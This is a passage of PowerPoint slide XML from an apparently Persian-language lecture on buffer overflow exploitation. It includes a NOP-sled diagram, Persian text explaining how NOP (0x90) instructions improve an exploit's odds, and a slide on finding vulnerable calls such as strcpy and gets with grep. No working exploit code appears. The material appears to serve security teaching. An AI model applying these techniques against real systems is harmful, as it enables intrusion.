      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23573" name="Text Box 1044"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23574" name="Text Box 1045"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23575" name="Text Box 1046"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23576" name="Text Box 1047"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23577" name="Text Box 1048"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23578" name="Text Box 1049"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23579" name="Text Box 1050"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23580" name="Text Box 1051"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23581" name="Text Box 1052"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23582" name="Text Box 1053"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23583" name="Text Box 1055"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4724400"/>
            <a:ext cx="8305800" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شما </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميتوانيد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با استفاده از دستورالعمل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>NOP (0x90)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> شانس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موفقيت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>خود را بالاتر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ببريد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fa-IR" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دستور العمل در واقع </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>يک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دستورالعمل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجرايي بيهوده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>است، که تا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>زماني </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>يک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دستور العمل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>واقعي نرسيده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجرا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميشود</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23584" name="Text Box 1056"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23585" name="Text Box 1057"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23586" name="Text Box 1058"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23587" name="Text Box 1059"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23588" name="Text Box 1060"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23589" name="Text Box 1061"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23590" name="Text Box 1062"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23591" name="AutoShape 1063"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="23556" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1828800" y="3276600"/>
            <a:ext cx="4876800" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4690"/>
              <a:gd name="adj2" fmla="val 1014583"/>
              <a:gd name="adj3" fmla="val 104750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>چگونه آسيب پذيري برنامه ها را پيدا کنيم</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="576115" y="2022475"/>
            <a:ext cx="7424885" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>UNIX - search through source code for vulnerable library calls (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, gets, etc.) and buffer operations that don’t check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bounds  </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grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is your friend</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76804" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3657600"/>
            <a:ext cx="7239000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>– Find one or wait to announce a Buffer overflow Vul. for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
